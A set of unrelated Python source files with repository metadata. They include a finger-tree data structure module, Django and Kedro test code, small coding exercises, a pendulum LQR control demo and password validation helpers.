#bug:not check_uint:::a_sized_finger_tree_ops = FingerTreeOps__funcs(finger_tree_ops__setting__2c3__1T4, the_monoid_ops4size, calc_auto_info_from_user_obj=lambda user_obj, /:1, careless_check_user_obj=check_uint)
a_sized_finger_tree_ops = FingerTreeOps__funcs(finger_tree_ops__setting__2c3__1T4, the_monoid_ops4size, calc_auto_info_from_user_obj=lambda user_obj, /:1, careless_check_user_obj=None)
if 1:
a_sized_finger_tree_ops
def _test__a_sized_finger_tree_ops():
ops = a_sized_finger_tree_ops
top_tree0 = ops.mk_empty_tree(0)
top_tree1 = ops.ipushL__top_tree(top_tree0, 'a')
it = ops.iter_user_objs__tree(0, top_tree1, reverse=False)
assert [*it] == ['a']
_test__a_sized_finger_tree_ops()
class IFingerTreeOps__sized(IFingerTreeOps):
@abstractmethod
def ___get_measurable_ops4auto_info2size___(sf, /):
'-> IMeasurableOps<auto_info, size> #see:get_measurable_ops4auto_info2size'
def get_measurable_ops4auto_info2size(sf, /):
'-> IMeasurableOps<auto_info, size> #see:___get_measurable_ops4auto_info2size___'
measurable_ops4auto_info2size = type(sf).___get_measurable_ops4auto_info2size___(sf)
check_instance(IMeasurableOps, measurable_ops4auto_info2size)
monoid_ops4size = measurable_ops4auto_info2size.get_monoid_ops4measured_result()
if not monoid_ops4size is the_monoid_ops4size: raise ValueError #even mk_ReversedMonoidOps since commutable
return measurable_ops4auto_info2size
def len__tree(sf, depth, tree, /):
'depth -> tree<depth> -> (size::uint)'
auto_info = sf.get_auto_info_from_tree(depth, tree)
measurable_ops4auto_info2size = sf.get_measurable_ops4auto_info2size()
sz = measurable_ops4auto_info2size.measure(auto_info)
check_uint(sz)
return sz
def len__element(sf, element, /):
'element -> (size::uint)'
return sf.len__xnode(0, element)#check inside
def len__node(sf, depth, node, /):
'depth -> node<depth> -> (size::uint)'
check_uint(depth)
return sf.len__xnode(depth+1, node)
def len__xnode(sf, depth, xnode, /):
'depth -> xnode<depth-1> -> (size::uint)'
check_uint(depth)
auto_info = sf.get_auto_info_from_xnode(depth, xnode)
measurable_ops4auto_info2size = sf.get_measurable_ops4auto_info2size()
sz = measurable_ops4auto_info2size.measure(auto_info)
check_uint(sz)
if not depth:
element = xnode
if not sz == 1: raise logic-err
return sz
def isplitL_at__tree(sf, depth, tree, i, /):
#return (ltree, sz_ltree, imay_offsetL_inside_mid_xnode, sz_mid, tmay_mid_xnode, rtree, mxrtree)
r'''depth -> tree<depth> -> (i::int) -> ((ltree<depth>, sz_ltree::uint, imay_offsetL_inside_mid_xnode::imay, sz_mid::uint, tmay_mid_xnode::(tmay xnode<depth-1>), rtree<depth>, mxrtree<depth>) |raise IndexError)
[not abs(i) <= len tree] <==> [raise IndexError]
let offsetted_i = i+sz if i < 0 else i
output:
ltree, sz_ltree=measured_result_after_ltree, tmay_mid_xnode, rtree, mxrtree
see:isplitL__tree.__doc__
imay_offsetL_inside_mid_xnode
== offsetted_i - sz_ltree if tmay_mid_xnode else -1
"L" means count from L to R based at end of ltree, i.e. begin of mid_xnode
sz_mid
== sum $ map len tmay_mid_xnode
#'''
#####################
r'''old api:depth -> tree<depth> -> (i::int) -> ((ltree<depth>, rtree<depth>, ex4head_rtree::(()|(head_xnode_of_rtree::xnode<depth-1>, offsetL_inside_xnode::uint, sz_xnode::uint))) |raise IndexError)
[not abs(i) <= len tree] <==> [raise IndexError]
[empty rtree] <==> [() == ex4head_rtree]
[nonempty rtree] <==> [(head rtree, idx_fromLtoR@head, len head) == ex4head_rtree]
[tree === join(ltree, rtree)]
[offsetted i@input === len ltree + offsetL_inside_xnode]
[0 <= offsetL_inside_xnode < len head]
#'''
sz = sf.len__tree(depth, tree)
i = offset_signed_idx_by_sz(sz, i)
check_int(i, min=0, max=sz)
measurable_ops4auto_info2size = sf.get_measurable_ops4auto_info2size()
def measured_result2is_ok(sz, /):
return i < sz
init_sz = 0
(ltree, sz_ltree, tmay_mid_xnode, rtree, mxrtree) = sf.isplitL__tree(depth, tree, measurable_ops4auto_info2size, init_sz, measured_result2is_ok)
if not (sz_ltree == sf.len__tree(depth, ltree)): raise logic-err
if tmay_mid_xnode:
[mid_xnode] = tmay_mid_xnode
sz_mid = sf.len__xnode(depth, mid_xnode)
assert sz_mid > 0
imay_offsetL_inside_mid_xnode = i - sz_ltree
else:
sz_mid = 0
imay_offsetL_inside_mid_xnode = -1
sz_lmxtree = sz_ltree + sz_mid
if not (sz_mid == 0 <= sz_ltree==i==sz_lmxtree==sz or sz_mid > 0 <= sz_ltree <= i < sz_lmxtree <= sz): raise logic-err
if depth==0:
if not (0 <= sz_mid <= 1): raise logic-err
if not (0 <= sz_ltree==i <=sz): raise logic-err
if not (-1 <= imay_offsetL_inside_mid_xnode < sz_mid): raise logic-err
if not (-1 == imay_offsetL_inside_mid_xnode < sz_mid == 0 or 0 <= imay_offsetL_inside_mid_xnode < sz_mid): raise logic-err
return (ltree, sz_ltree, imay_offsetL_inside_mid_xnode, sz_mid, tmay_mid_xnode, rtree, mxrtree)
may = sf.may_ipopL__tree(depth, mxrtree)
if i < sz:
if may is None: raise logic-err
tail_of_rtree, head_xnode_of_rtree = may
szL = sf.len__tree(depth, ltree)
sz_xnode = sf.len__xnode(depth, head_xnode_of_rtree)
if not 0 <= szL <= i < szL+sz_xnode <= sz: raise logic-err
offsetL_inside_xnode = i - szL
if not 0 <= offsetL_inside_xnode < sz_xnode: raise logic-err
ex4head_rtree = (head_xnode_of_rtree, offsetL_inside_xnode, sz_xnode)
else:
if not may is None: raise logic-err
#ltree = tree
#rtree = empty
ex4head_rtree = ()
return (ltree, rtree, ex4head_rtree)
#end of def isplitL_at__tree(sf, depth, tree, i, /):
def isplitR_at__tree(sf, depth, tree, i, /):
#return (lmxtree, ltree, tmay_mid_xnode, sz_mid, imay_offsetR_inside_mid_xnode, sz_rtree, rtree)
r'''depth -> tree<depth> -> (i::int) -> ((lmxtree<depth>, ltree<depth>, tmay_mid_xnode::(tmay xnode<depth-1>), sz_mid::uint, imay_offsetR_inside_mid_xnode::imay, sz_rtree::uint, rtree<depth>) |raise IndexError)
[not abs(i) <= len tree] <==> [raise IndexError]
let offsetted_i = i+sz if i < 0 else i
output:
lmxtree, ltree, tmay_mid_xnode, sz_rtree=measured_result_before_rtree, rtree
see:isplitR__tree.__doc__
imay_offsetR_inside_mid_xnode
== offsetted_i - sz_rtree if tmay_mid_xnode else -1
"R" means count from R to L based at begin of rtree, i.e. end of mid_xnode
sz_mid
== sum $ map len tmay_mid_xnode
#'''
#####################
r'''old api:depth -> tree<depth> -> (i::int) -> ((ltree<depth>, rtree<depth>, ex4last_ltree::(()|(last_xnode_of_ltree::xnode<depth-1>, offsetR_inside_xnode::uint, sz_xnode::uint))) |raise IndexError)
[not abs(i) <= len tree] <==> [raise IndexError]
[empty ltree] <==> [() == ex4last_ltree]
[nonempty ltree] <==> [(last ltree, idx_fromRtoL@last, len last) == ex4last_ltree]
[tree === join(ltree, rtree)]
[offsetted i@input === offsetR_inside_xnode + len rtree]
[0 <= offsetR_inside_xnode < len last]
#'''
ops = mk_ReversedFingerTreeOps(sf)
(rtree, sz_rtree, imay_offsetR_inside_mid_xnode, sz_mid, tmay_mid_xnode, ltree, lmxtree) = ops.isplitL_at__tree(depth, tree, i)
#output flip here!!!
return (lmxtree, ltree, tmay_mid_xnode, sz_mid, imay_offsetR_inside_mid_xnode, sz_rtree, rtree)
def at__tree(sf, depth, tree, i, /):
'depth -> tree<depth> -> (i::int) -> ((xnode<depth-1>, offsetL_inside_xnode::uint, sz_xnode::uint)|raise IndexError)'
(ltree, sz_ltree, imay_offsetL_inside_mid_xnode, sz_mid, tmay_mid_xnode, rtree, mxrtree) = sf.isplitL_at__tree(depth, tree, i)
if not tmay_mid_xnode: raise IndexError
[mid_xnode] = tmay_mid_xnode
offsetL_inside_mid_xnode = imay_offsetL_inside_mid_xnode
check_uint(offsetL_inside_mid_xnode)
xnode = mid_xnode
offsetL_inside_xnode = offsetL_inside_mid_xnode
sz_xnode = sz_mid
return (xnode, offsetL_inside_xnode, sz_xnode)
def isplit_at__top_tree(sf, top_tree, i, /):
'tree<depth=0> -> (i::int) -> ((ltree<depth=0>, tmay_mid_user_obj::tmay user_obj, rtree<depth=0>, mxrtree<depth=0>) |raise IndexError)'
'old api:tree<depth=0> -> (i::int) -> ((ltree<depth=0>, rtree<depth=0>, tmay_head_user_obj_of_rtree) |raise IndexError)'
depth = 0
(ltree, sz_ltree, imay_offsetL_inside_mid_xnode, sz_mid, tmay_mid_xnode, rtree, mxrtree) = sf.isplitL_at__tree(depth, top_tree, i)
#may raise IndexError inside
if not tmay_mid_xnode:
() = tmay_mid_xnode
if not -1 == imay_offsetL_inside_mid_xnode < sz_mid == 0: raise logic-err
tmay_mid_user_obj = ()
else:
(mid_xnode,) = tmay_mid_xnode
if not 0 == imay_offsetL_inside_mid_xnode < sz_mid == 1: raise logic-err
element = mid_xnode
user_obj, auto_info = sf.unbox_element(element)
mid_user_obj = user_obj
tmay_mid_user_obj = (mid_user_obj,)
tmay_mid_user_obj
return (ltree, tmay_mid_user_obj, rtree, mxrtree)
def at__top_tree(sf, top_tree, i, /):
'tree<depth=0> -> (i::int) -> (user_obj|raise IndexError)'
if 1:
(ltree, tmay_mid_user_obj, rtree, mxrtree) = sf.isplit_at__top_tree(top_tree, i)
if not tmay_mid_user_obj: raise IndexError
[user_obj] = tmay_mid_user_obj
else:
depth = 0
(xnode, offsetL_inside_xnode, sz_xnode) = sf.at__tree(depth, top_tree, i)
element = xnode
if not 0 == offsetL_inside_xnode < sz_xnode == 1: raise logic-err
user_obj, auto_info = sf.unbox_element(element)
return user_obj
def slice__top_tree(sf, top_tree, begin, end, /):
'tree<depth=0> -> (begin::may int) -> (end::may int) -> (tree<depth=0>|raise IndexError)'
depth = 0
sz = sf.len__tree(depth, top_tree)
(begin, end) = offset_may_signed_rng_by_sz(sz, begin, end)
if end <= begin:
empty_tree = sf.mk_empty_tree(depth)
new_tree = empty_tree
else:
ltree, _tm_mid, _rtree, _mxrtree = sf.isplit_at__top_tree(top_tree, end)
_ltreeL, _tm_midL, _rtreeL, mxrtreeL = sf.isplit_at__top_tree(ltree, begin)
new_tree = mxrtreeL
return new_tree
#end of class IFingerTreeOps__sized(IFingerTreeOps):
def offset_may_signed_rng_by_sz(sz, begin, end, /):
if begin is None:
begin = 0
if end is None:
end = sz
begin = offset_signed_idx_by_sz(sz, begin)
end = offset_signed_idx_by_sz(sz, end)
return begin, end
def offset_signed_idx_by_sz(sz, idx, /):
check_int(idx)
check_uint(sz)
if not -sz <= idx <= sz: raise IndexError
if idx < 0:
idx += sz
check_int(idx, min=0, max=sz)
return idx
class IFingerTreeOps__max_priority(IFingerTreeOps):
@abstractmethod
def ___get_measurable_ops4auto_info2max_priority___(sf, /):
'-> IMeasurableOps<auto_info, max_priority> #see:get_measurable_ops4auto_info2max_priority'
def get_measurable_ops4auto_info2max_priority(sf, /):
'-> IMeasurableOps<auto_info, max_priority> #see:___get_measurable_ops4auto_info2max_priority___'
measurable_ops4auto_info2max_priority = type(sf).___get_measurable_ops4auto_info2max_priority___(sf)
check_instance(IMeasurableOps, measurable_ops4auto_info2max_priority)
monoid_ops4max_priority = measurable_ops4auto_info2max_priority.get_monoid_ops4measured_result()
if not isinstance(monoid_ops4max_priority, IMonoidOps4max): raise ValueError #even mk_ReversedMonoidOps since commutable
return measurable_ops4auto_info2max_priority
r'''
... ...TODO
pop max?
insert at eqvL/R keep sorted as if asc/dec??
3'''
#end of class IFingerTreeOps__sized(IFingerTreeOps):
#
#HHHHH
| [
"wuming_zher@zoho.com.cn"
] | wuming_zher@zoho.com.cn |
4d27f8a2e3a7a4c655602b958bdd5755afb6049f | ad13583673551857615498b9605d9dcab63bb2c3 | /output/models/nist_data/list_pkg/unsigned_int/schema_instance/nistschema_sv_iv_list_unsigned_int_enumeration_5_xsd/__init__.py | aac688dac1eef59628983e92d248aa85f031d7b3 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 395 | py | from output.models.nist_data.list_pkg.unsigned_int.schema_instance.nistschema_sv_iv_list_unsigned_int_enumeration_5_xsd.nistschema_sv_iv_list_unsigned_int_enumeration_5 import (
NistschemaSvIvListUnsignedIntEnumeration5,
NistschemaSvIvListUnsignedIntEnumeration5Type,
)
__all__ = [
"NistschemaSvIvListUnsignedIntEnumeration5",
"NistschemaSvIvListUnsignedIntEnumeration5Type",
]
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
ebba29e91a30057168a0cd0f69ce39d84363309c | aa9e472929a1f3f87bbcd5cc272be99a68bf047a | /tuples/find_repeated_items.py | f5ead828d7bb5bb8c756c383020eb510d31fe6c4 | [] | no_license | stradtkt/Python-Exercises | 226706542f88973f77e6f2870b21cd87a278bf2b | 18353443b146ce6e8345fcf618d07de2bae6eb86 | refs/heads/master | 2020-03-19T16:09:51.006809 | 2018-06-30T20:28:34 | 2018-06-30T20:28:34 | 136,703,335 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | my_tuple = 2,4,6,2,4,6,5,2,4,6,7
count1 = my_tuple.count(2)
count2 = my_tuple.count(4)
count3 = my_tuple.count(6)
print(count1)
print(count2)
print(count3) | [
"stradtkt22@gmail.com"
] | stradtkt22@gmail.com |
b281272d10fb31464d7d8a0cb4e290739c32189e | 634367d6a94d9bce231a8c29cf9713ebfc4b1de7 | /covid_dashboard/views/get_day_wise_district_details/tests/test_case_02.py | f45bf3a2ba5ff1d48aed35ca3ba4a418dcc8c048 | [] | no_license | saikiranravupalli/covid_dashboard | 5a48c97597983ada36a3bf131edf5ca15f1dedec | 954dd02819fb8f6776fa2828e8971bd55efa657c | refs/heads/master | 2022-11-08T10:11:27.836507 | 2020-06-30T09:00:27 | 2020-06-30T09:00:27 | 269,610,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,278 | py | """
# TODO: get_day_wise_district_details with valid district_id returns details
"""
from covid_dashboard.utils.custom_test_utils import CustomTestUtils
from . import APP_NAME, OPERATION_NAME, REQUEST_METHOD, URL_SUFFIX
REQUEST_BODY = """
{}
"""
TEST_CASE = {
"request": {
"path_params": {"district_id": "1"},
"query_params": {},
"header_params": {},
"securities": {"oauth": {"tokenUrl": "http://localhost:8080/o/token", "flow": "password", "scopes": ["read"], "type": "oauth2"}},
"body": REQUEST_BODY,
},
}
class TestCase02GetDayWiseDistrictDetailsAPITestCase(CustomTestUtils):
app_name = APP_NAME
operation_name = OPERATION_NAME
request_method = REQUEST_METHOD
url_suffix = URL_SUFFIX
test_case_dict = TEST_CASE
def setupUser(self, username, password):
super(TestCase02GetDayWiseDistrictDetailsAPITestCase, self).\
setupUser(username=username, password=password)
self.statistics()
def test_case(self):
response = self.default_test_case()
import json
response_content = json.loads(response.content)
self.assert_match_snapshot(
name='get_day_wise_district_details_response',
value=response_content
)
| [
"saikiranravupalli@gmail.com"
] | saikiranravupalli@gmail.com |
5d51b6541ffc22ba6dbade62616ccfd70e03dba4 | e2d22f12f8e540a80d31de9debe775d35c3c5c22 | /blousebrothers/users/migrations/0002_auto_20161009_0739.py | 5caaeef0f9d6ef6321c753470fdeb2432fd49587 | [
"MIT"
] | permissive | sladinji/blousebrothers | 360c3b78ec43379977dbf470e5721e6a695b2354 | 461de3ba011c0aaed3f0014136c4497b6890d086 | refs/heads/master | 2022-12-20T10:24:07.631454 | 2019-06-13T13:17:35 | 2019-06-13T13:17:35 | 66,867,705 | 1 | 0 | NOASSERTION | 2022-12-19T18:15:44 | 2016-08-29T18:04:33 | Python | UTF-8 | Python | false | false | 757 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-10-09 07:39
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='user',
name='email',
field=models.EmailField(max_length=254, verbose_name='email address'),
),
migrations.AlterField(
model_name='user',
name='university',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='users.University', verbose_name='Ville de CHU actuelle'),
),
]
| [
"julien.almarcha@gmail.com"
] | julien.almarcha@gmail.com |
bbc0d7036c3b0d1661ec5acc2b80f06806aeda93 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /L4HM6uMHDCnepz5HK_7.py | d5c57b4d97b416320f6e56898bb1695785da62cf | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
Create a function that takes date in the format **yyyy/mm/dd** as an input and
returns `"Bonfire toffee"` if the date is October 31, else return `"toffee"`.
### Examples
halloween("2013/10/31") ➞ "Bonfire toffee"
halloween("2012/07/31") ➞ "toffee"
halloween("2011/10/12") ➞ "toffee"
### Notes
N/A
"""
halloween=lambda d:"Bonfire "*(d[-5:]=="10/31")+"toffee"
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
e628538fa02d09604b3f2fe873cba3fcd99a1d5c | 80e527f63953a43f7f70112759f27a75d0b25179 | /pytext/data/test/kd_doc_classification_data_handler_test.py | 8d0108c8284547354a1c3e5775a04351fee3bc40 | [
"BSD-3-Clause"
] | permissive | shruti-bh/pytext | 901c195b74a03c6efe965cbfce8fde28560e47db | ae84a5493a5331ac07699d3dfa5b9de521ea85ea | refs/heads/master | 2020-04-22T13:11:20.178870 | 2019-02-12T20:56:34 | 2019-02-12T21:20:25 | 170,400,331 | 1 | 0 | NOASSERTION | 2019-02-12T22:20:47 | 2019-02-12T22:20:47 | null | UTF-8 | Python | false | false | 3,136 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
from pytext.config.field_config import FeatureConfig
from pytext.config.kd_doc_classification import ModelInputConfig, Target, TargetConfig
from pytext.data import KDDocClassificationDataHandler
from pytext.data.featurizer import SimpleFeaturizer
from pytext.data.kd_doc_classification_data_handler import ModelInput, RawData
from pytext.utils.test_utils import import_tests_module
tests_module = import_tests_module()
class KDDocClassificationDataHandlerTest(unittest.TestCase):
def setUp(self):
file_name = tests_module.test_file("knowledge_distillation_test_tiny.tsv")
label_config_dict = {"target_prob": True}
data_handler_dict = {
"columns_to_read": [
"text",
"target_probs",
"target_logits",
"target_labels",
"doc_label",
]
}
self.data_handler = KDDocClassificationDataHandler.from_config(
KDDocClassificationDataHandler.Config(**data_handler_dict),
ModelInputConfig(),
TargetConfig(**label_config_dict),
featurizer=SimpleFeaturizer.from_config(
SimpleFeaturizer.Config(), FeatureConfig()
),
)
self.data = self.data_handler.read_from_file(
file_name, self.data_handler.raw_columns
)
def test_create_from_config(self):
expected_columns = [
RawData.TEXT,
RawData.TARGET_PROBS,
RawData.TARGET_LOGITS,
RawData.TARGET_LABELS,
RawData.DOC_LABEL,
]
# check that the list of columns is as expected
self.assertTrue(self.data_handler.raw_columns == expected_columns)
def test_read_from_file(self):
# Check if the data has 10 rows and 5 columns
self.assertEqual(len(self.data), 10)
self.assertEqual(len(self.data[0]), 5)
self.assertEqual(self.data[0][RawData.TEXT], "Who R U ?")
self.assertEqual(
self.data[0][RawData.TARGET_PROBS],
"[-0.005602254066616297, -5.430975914001465]",
)
self.assertEqual(
self.data[0][RawData.TARGET_LABELS], '["cu:other", "cu:ask_Location"]'
)
def test_tokenization(self):
data = list(self.data_handler.preprocess(self.data))
# test tokenization without language-specific tokenizers
self.assertListEqual(data[0][ModelInput.WORD_FEAT], ["who", "r", "u", "?"])
self.assertListEqual(
data[0][Target.TARGET_PROB_FIELD],
[-0.005602254066616297, -5.430975914001465],
)
def test_align_target_label(self):
target = [[0.1, 0.2, 0.3], [0.1, 0.2, 0.3]]
label_list = ["l1", "l2", "l3"]
batch_label_list = [["l3", "l2", "l1"], ["l1", "l3", "l2"]]
align_target = self.data_handler._align_target_label(
target, label_list, batch_label_list
)
self.assertListEqual(align_target, [[0.3, 0.2, 0.1], [0.1, 0.3, 0.2]])
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
f83506a11c7bb222bdbd4f3d5c0f18adfbef24c5 | 385ab972316b41cb0643f1050f9220b8eaeb4647 | /cutTheSticks.py | b33dc260c16a89e751d1f3844911ef48097f6cb2 | [] | no_license | Rpratik13/HackerRank | 09174c9b331e25cec33848a80e9109800cdbc894 | 38b9a39261bfb3b2fc208ad1e3d8a485585b419a | refs/heads/master | 2020-03-22T05:24:03.516086 | 2020-01-31T16:08:19 | 2020-01-31T16:08:19 | 139,563,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | def cutTheSticks(arr):
ans = []
while max(arr)!=0:
while min(arr)==0:
arr.remove(0)
min1 = min(arr)
count = 0
for i in range(0,len(arr)):
arr[i]-=min1
count+=1
ans.append(count)
return ans
n = int(input())
arr = list(map(int, input().rstrip().split()))
result = cutTheSticks(arr)
for i in result:
print(i) | [
"r.pratik013@gmail.com"
] | r.pratik013@gmail.com |
3019e63efae8bf251345dedc6ade8214439b4276 | d9504b779ca6d25a711c13fafc1b8669c60e6f62 | /shape_recognition/libraries/braile_recognition/plotScript.py | 4a9bd429775020ba0b1151785b48933dbe7560e2 | [
"MIT"
] | permissive | ys1998/tactile-shape-recognition | dcdd3f4da66b4b3f6159dccf9cec4d367f6483d9 | b5ab6f1cdf04ff23e14b467a590533e7ee740b52 | refs/heads/master | 2020-03-18T03:01:17.985074 | 2018-07-28T09:46:16 | 2018-07-28T09:46:16 | 134,218,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | py | import numpy as np
import matplotlib.pyplot as plt
c = 0
r = 3
s = np.loadtxt('./NewData_BRC/BRC_B5.txt')
taxel = []
for k in range(c,len(s),4):
taxel.append(s[k,r])
print len(taxel)
plt.figure()
plt.plot(taxel)
plt.show()
| [
"yashshah2398@gmail.com"
] | yashshah2398@gmail.com |
8d5a89a05b311b9d5137c404950505cd7eac5bfa | f3f7099576adfb683fb74c575b235bdd6c2900c7 | /examples/demos_by_system/pendulum_double/double_pendulum_with_lqr.py | cda2f8818732a357ed072532029e056e2fe8a0f4 | [
"MIT"
] | permissive | SherbyRobotics/pyro | a1fac4508162aff662c4c6073eb2adf357b1bc8b | baed84610d6090d42b814183931709fcdf61d012 | refs/heads/master | 2023-08-08T16:16:31.510887 | 2023-07-26T17:36:26 | 2023-07-26T17:36:26 | 153,139,985 | 35 | 23 | MIT | 2023-07-26T17:36:27 | 2018-10-15T15:45:09 | Python | UTF-8 | Python | false | false | 801 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 24 11:51:18 2020
@author: alex
"""
import numpy as np
from pyro.dynamic.pendulum import DoublePendulum
from pyro.analysis.costfunction import QuadraticCostFunction
from pyro.dynamic.statespace import linearize
from pyro.control.lqr import synthesize_lqr_controller
# Non-linear model
sys = DoublePendulum()
# Linear model
ss = linearize( sys , 0.01 )
# Cost function
cf = QuadraticCostFunction.from_sys( sys )
cf.R[0,0] = 1000
cf.R[1,1] = 10000
# LQR controller
ctl = synthesize_lqr_controller( ss , cf )
# Simulation Closed-Loop Non-linear with LQR controller
cl_sys = ctl + sys
cl_sys.x0 = np.array([0.4,0,0,0])
cl_sys.compute_trajectory()
cl_sys.plot_trajectory('xu')
cl_sys.animate_simulation() | [
"alx87grd@gmail.com"
] | alx87grd@gmail.com |
ea960fdb336509f7286bd45c359d6f34b4776066 | 3d6704216b1acfe1c97048c1999657537596916c | /django_test/users/validators/password.py | 458a8e4d1aacd4add82592ca255529af6447b942 | [] | no_license | jupiny/django_test | e2310ee485e570e92b3f66e7f23dfa8c36a63c58 | b3ef08259177229166e54ede8f7315e2522af438 | refs/heads/master | 2021-01-17T15:46:06.636001 | 2016-11-03T05:27:34 | 2016-11-03T05:27:34 | 59,828,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 875 | py | import re
from django.core.exceptions import ValidationError
MINIMUM_LENGTH = 8
def validate_minimum_length(value):
if len(value) < MINIMUM_LENGTH:
raise ValidationError("The password should be at least {0} characters long.".format(MINIMUM_LENGTH))
def validate_letters(value):
# Number
if not re.search(r'[0-9]', value):
raise ValidationError("Password must contain at least 1 digit.")
# Lowercase letters
if not re.search(r'[a-z]', value):
raise ValidationError("Password must contain at least 1 lowercase letter.")
# Uppercase letters
if not re.search(r'[A-Z]', value):
raise ValidationError("Password must contain at least 1 uppercase letter.")
# Special characters
if not re.search(r'[!@#$%^&*+=]', value):
raise ValidationError("Password must contain at least 1 special character.")
| [
"tmdghks584@gmail.com"
] | tmdghks584@gmail.com |
ca6c45bf21e217f99fdab1def87ac38681fe797e | f901fae034458703f5ca9a9a81433a2dcb1b8b1c | /tests/framework/hooks/test_context_hooks.py | b6b68abfe99bbe9098429bde1747b883483e577a | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | kiminh/kedro | bb6df5867bcca307adc0b321343da70f5c899540 | 8c0a8ccbffa22daf64a31fea138402a34fd51f2b | refs/heads/master | 2022-12-09T10:05:34.300506 | 2020-09-23T12:28:47 | 2020-09-23T12:28:47 | 299,792,869 | 1 | 0 | NOASSERTION | 2020-09-30T02:49:54 | 2020-09-30T02:49:53 | null | UTF-8 | Python | false | false | 27,700 | py | # Copyright 2020 QuantumBlack Visual Analytics Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND
# NONINFRINGEMENT. IN NO EVENT WILL THE LICENSOR OR OTHER CONTRIBUTORS
# BE LIABLE FOR ANY CLAIM, DAMAGES, OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF, OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The QuantumBlack Visual Analytics Limited ("QuantumBlack") name and logo
# (either separately or in combination, "QuantumBlack Trademarks") are
# trademarks of QuantumBlack. The License does not grant you any right or
# license to the QuantumBlack Trademarks. You may not use the QuantumBlack
# Trademarks or any confusingly similar mark as a trademark for your product,
# or use the QuantumBlack Trademarks in any other manner that might cause
# confusion in the marketplace, including but not limited to in advertising,
# on websites, or on software.
#
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import re
import sys
from collections import namedtuple
from logging.handlers import QueueHandler, QueueListener
from multiprocessing import Queue
from pathlib import Path
from typing import Any, Dict, Iterable, List, Optional, Union
import pandas as pd
import pytest
import yaml
from kedro import __version__
from kedro.config import ConfigLoader
from kedro.framework.context import KedroContext
from kedro.framework.context.context import _convert_paths_to_absolute_posix
from kedro.framework.hooks import hook_impl
from kedro.framework.hooks.manager import _create_hook_manager
from kedro.io import DataCatalog
from kedro.pipeline import Pipeline
from kedro.pipeline.node import Node, node
from kedro.runner import ParallelRunner
from kedro.versioning import Journal
@pytest.fixture
def local_logging_config():
return {
"version": 1,
"formatters": {
"simple": {"format": "%(asctime)s - %(name)s - %(levelname)s - %(message)s"}
},
"root": {"level": "INFO", "handlers": ["console"]},
"loggers": {"kedro": {"level": "INFO", "handlers": ["console"]}},
"handlers": {
"console": {
"class": "logging.StreamHandler",
"level": "INFO",
"formatter": "simple",
"stream": "ext://sys.stdout",
}
},
}
def _write_yaml(filepath: Path, config: Dict):
filepath.parent.mkdir(parents=True, exist_ok=True)
yaml_str = yaml.dump(config)
filepath.write_text(yaml_str)
@pytest.fixture
def local_config(tmp_path):
cars_filepath = str(tmp_path / "cars.csv")
boats_filepath = str(tmp_path / "boats.csv")
return {
"cars": {
"type": "pandas.CSVDataSet",
"filepath": cars_filepath,
"save_args": {"index": False},
"versioned": True,
},
"boats": {
"type": "pandas.CSVDataSet",
"filepath": boats_filepath,
"versioned": True,
},
}
@pytest.fixture(autouse=True)
def config_dir(tmp_path, local_config, local_logging_config):
catalog = tmp_path / "conf" / "base" / "catalog.yml"
credentials = tmp_path / "conf" / "local" / "credentials.yml"
logging = tmp_path / "conf" / "local" / "logging.yml"
kedro_yml = tmp_path / ".kedro.yml"
_write_yaml(catalog, local_config)
_write_yaml(credentials, {"dev_s3": "foo"})
_write_yaml(logging, local_logging_config)
_write_yaml(kedro_yml, {})
@pytest.fixture(autouse=True)
def hook_manager(monkeypatch):
# re-create the global hook manager after every test
hook_manager = _create_hook_manager()
monkeypatch.setattr("kedro.framework.hooks.get_hook_manager", lambda: hook_manager)
monkeypatch.setattr(
"kedro.framework.context.context.get_hook_manager", lambda: hook_manager
)
monkeypatch.setattr("kedro.runner.runner.get_hook_manager", lambda: hook_manager)
return hook_manager
def identity(x: str):
return x
def broken_node():
raise ValueError("broken")
def assert_exceptions_equal(e1: Exception, e2: Exception):
assert isinstance(e1, type(e2)) and str(e1) == str(e2)
